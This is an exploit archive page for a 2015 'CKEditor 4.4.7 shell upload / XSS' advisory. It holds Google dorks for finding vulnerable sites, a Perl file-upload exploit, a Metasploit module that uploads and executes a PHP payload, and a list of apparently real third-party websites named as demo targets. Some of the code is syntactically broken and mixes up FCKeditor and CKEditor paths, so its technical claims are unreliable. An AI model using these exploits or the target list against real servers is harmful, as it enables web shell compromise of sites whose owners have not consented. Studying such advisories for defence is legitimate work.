exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Ckeditor 4.4.7 Shell Upload / Cross Site Scripting

Ckeditor 4.4.7 Shell Upload / Cross Site Scripting
Posted Mar 13, 2015
Authored by KedAns-Dz

Ckeditor version 4.4.7.x suffers from cross site scripting and remote shell upload vulnerabilities.

tags | exploit, remote, shell, vulnerability, xss
SHA-256 | ff9f0475f02a2da2c698414df7fb0c688da73c1d1cf63ce8051b290f339e9813

Ckeditor 4.4.7 Shell Upload / Cross Site Scripting

Change Mirror Download
#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
# *----------------------------* #
# K |....##...##..####...####....| . #
# h |....#...#........#..#...#...| A #
# a |....#..#.........#..#....#..| N #
# l |....###........##...#.....#.| S #
# E |....#.#..........#..#....#..| e #
# D |....#..#.........#..#...#...| u #
# . |....##..##...####...####....| r #
# *----------------------------* #
#[ Copyright © 2014 | Dz Offenders Cr3w ]#
# >> D_x . Made In Algeria . x_Z << #
# [>] Title : Ckeditor v4.4.7.xx Multiple Vulnerabilities
# [>] Author : KedAns-Dz
# [+] E-mail : ked-h (@hotmail.com)
# [+] FaCeb0ok : fb.me/K3d.Dz
# [+] TwiTter : @kedans
# [#] Platform : PHP / WebApp
# [+] Cat/Tag : File Upload , XSRF-HTML Injection
# [<] <3 <3 Greetings t0 Palestine <3 <3
# [>] ^_^ Greetings to 1337day Users/FAN's <3
# [-] F-ck Hacking , LuV Exploiting
# [!] Vendor : http://ckeditor.com/
# [D] Download :
# - http://download.cksource.com/CKEditor/CKEditor/CKEditor%204.4.7/ckeditor_4.4.7_full.zip
# [!] Description :
# FCKeditor version 4.4.7 is suffer from XSS/HTML Injection and
# Other multiple vulnerabilities like File Upload (more ex: see->
# [ http://1337day.com/search?search_request=ckeditor ]
# remote attacker can use some CKE files to upload remote file or
# Injecting XSS/HTML Codes.
# [!] Google Dorks :
# ------------------
# 1- allinurl:"/ckeditor/samples/plugins/htmlwriter"
# 2- allinurl:"/ckeditor/samples/plugins/htmlwriter/outputhtml.html"
# 3- allinurl:"/FCKeditor/_samples/php/sample01.php"
# 4- allinurl:"/FCKeditor/editor/filemanager/browser/default/browser.html"
# 5- allinurl:"/FCKeditor/editor/filemanager"
# [+] Exploit (1) ' XSS/XSRF/HTML Injection ' :=>
# -----------------------------------------------
# - the vuln in htmlwriter plugin :
# > http://[target]/[path]/ckeditor/samples/plugins/htmlwriter/outputhtml.html
# > Edit & Submit you'r Code just it !
# [+] Exploit (2) ' File Upload ' :=>
# -----------------------------------
# REF : http://1337day.com/search?search_request=ckeditor
# +> Use this PERL Script :=>
# ***********
# #!/usr/bin/perl
# use strict;
# use LWP::UserAgent;
# use HTTP::Request::Common;
# print <<INTRO;
# - CKEditor 4.4.x Arbitrary File Upload Exploit
# - Coded By KedAns-Dz
# - Contact: ked-h@hotmail.com
# - Greetings: 1337day , Dz Offenders , All my Homies
# - Copyright (C) 03-2015 - Dz Offenders Cr3w
# print "Target host and Path: ";
# chomp (my $tar=<STDIN>);
# print "Directory / File / Shell: ";
# chomp (my $shell=<STDIN>);
# my $a = LWP::UserAgent->new;
# my $b = $a->request(POST $tar.'/fckeditor/editor/filemanager/browser/upload/php/upload.php';
# Content_Type => 'form-data',
# Content => [ NewFile => $shell ] );
# if ($b->is_success) {
# if (index($b->content, "Disabled") != -1) { print "The webserver is manipulated with your shellcode.\n"; }
# else { print "Exploit failed! :(\n";
# } else { print "Not connected with Target!\n"; }
# *********
# Or wit' that MSF Exploit :=>
# require 'msf/core'
# class Metasploit3 < Msf::Exploit::Remote
# Rank = ExcellentRanking
# include Msf::Exploit::Remote::HttpClient
# def initialize(info = {})
# super(update_info(info,
# 'Name' => 'FCKeditor 4.4.x File Upload Code Execution',
# 'Description' => %q{
# This module exploits a vulnerability in the FCK/CKeditor plugin.
# By renaming the uploaded file this vulnerability can be used to upload/execute
# code on the affected system.
# },
# 'Author' => [ 'KedAns-Dz <ked-h[at]1337day.com>' ],
# 'License' => MSF_LICENSE,
# 'Version' => '1.0',
# 'References' =>
# [
# ['URL', 'http://1337day.com/search?search_request=ckeditor'],
# ],
# 'Privileged' => false,
# 'Payload' =>
# {
# 'DisableNops' => true,
# 'Compat' =>
# {
# 'ConnectionType' => 'find',
# },
# 'Space' => 1024,
# },
# 'Platform' => 'php',
# 'Arch' => ARCH_PHP,
# 'Targets' => [[ 'Automatic', { }]],
# 'DisclosureDate' => '02/05/2011',
# 'DefaultTarget' => 0))
# register_options(
# [
# OptString.new('URI', [true, "CKE Target directory path", "/"]),
# ], self.class)
# end
# def check
# uri = ''
# uri << datastore['URI']
# uri << '/' if uri[-1,1] != '/'
# uri << 'fckeditor/editor/filemanager/connectors/php/upload.php?Type=File'
# res = send_request_raw(
# {
# 'uri' => uri
# }, 25)
# if (res and res.body =~ /sample16.swf/)
# return Exploit::CheckCode::Vulnerable
# end
# return Exploit::CheckCode::Safe
# end
# def retrieve_obfuscation()
# end
# def exploit
# cmd_php = '<?php ' + payload.encoded + '?>'
# # Generate some random strings
# cmdscript = rand_text_alpha_lower(20)
# boundary = rand_text_alphanumeric(6)
# # Static files
# directory = '/fckeditor/editor/images'
# uri_base = ''
# uri_base << datastore['URI']
# uri_base << '/' if uri_base[-1,1] != '/'
# uri_base << 'fckeditor/editor/filemanager/connectors/php'
# # Get obfuscation code (needed to upload files)
# obfuscation_code = nil
# res = send_request_raw({
# 'uri' => uri_base + '/upload.php?Type=File'
# }, 25)
# if (res)
# if(res.body =~ /"obfus", "((\w)+)"\)/)
# obfuscation_code = $1
# print_status("Successfully retrieved obfuscation code: #{obfuscation_code}")
# else
# print_error("Error retrieving obfuscation code!")
# return
# end
# end
# # Upload shellcode (file ending .ph.p)
# data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filename\"\r\n\r\n"
# data << "#{cmdscript}.ph.p\r\n--#{boundary}"
# data << "\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"#{cmdscript}.ph.p\"\r\n"
# data << "Content-Type: application/octet-stream\r\n\r\n"
# data << cmd_php
# data << "\r\n--#{boundary}--"
# res = send_request_raw({
# 'uri' => uri_base + "/connector.php?Command=FileUpload&Type=File&CurrentFolder=" + directory + "&obfuscate=#{obfuscation_code}",
# 'method' => 'POST',
# 'data' => data,
# 'headers' =>
# {
# 'Content-Length' => data.length,
# 'Content-Type' => 'multipart/form-data; boundary=' + boundary,
# }
# }, 25)
# if (res and res.body =~ /File Upload Success/)
# print_status("Successfully uploaded #{cmdscript}.ph.p")
# else
# print_error("Error uploading #{cmdscript}.ph.p")
# end
# # Complete the upload process (rename file)
# print_status("Renaming file from #{cmdscript}.ph.p_ to #{cmdscript}.ph.p")
# res = send_request_raw({
# 'uri' => uri_base + '/connector.php?Command=FileUpload&Type=File&CurrentFolder=' + directory + '&filetotal=1'
# })
# # Rename the file from .ph.p to .php
# res = send_request_cgi(
# {
# 'method' => 'POST',
# 'uri' => uri_base + '/connector.php?Command=Edit&Type=File&CurrentFolder=',
# 'vars_post' =>
# {
# 'actionfile[0]' => "#{cmdscript}.ph.p",
# 'renameext[0]' => 'p',
# 'renamefile[0]' => "#{cmdscript}.ph",
# 'sortby' => 'name',
# 'sorttype' => 'asc',
# 'showpage' => '0',
# 'action' => 'rename',
# 'commit' => '',
# }
# }, 10)
# if (res and res.body =~ /successfully renamed./)
# print_status ("Renamed #{cmdscript}.ph.p to #{cmdscript}.php")
# else
# print_error("Failed to rename #{cmdscript}.ph.p to #{cmdscript}.php")
# end
# # Finally call the payload
# print_status("Calling payload: #{cmdscript}.php")
# uri = ''
# uri << datastore['URI']
# uri << '/' if uri[-1,1] != '/'
# uri << directory + cmdscript + ".php"
# res = send_request_raw({
# 'uri' => uri
# }, 25)
# end
# end
# Demo's :=>
# http://common.beyondindigopets.com/ckeditor/samples/plugins/htmlwriter/outputhtml.html
# http://heather.cs.ucdavis.edu/ckeditor/samples/plugins/htmlwriter/outputhtml.html
# http://dol-de-bretagne.fr/scripts/FCKeditor/_samples/php/sample01.php
# http://tutor.talkbean.com/front/com/FCKeditor/editor/filemanager/browser/default/browser.html
# http://www.aseat.fr/fckeditor/editor/filemanager/browser/default/browser.html
# Mo in g00glE ;)

# <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
# Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 ,
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day &
# =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )=
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    47 Files
  • 25
    Jul 25th
    31 Files
  • 26
    Jul 26th
    13 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    27 Files
  • 30
    Jul 30th
    49 Files
  • 31
    Jul 31st
    29 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By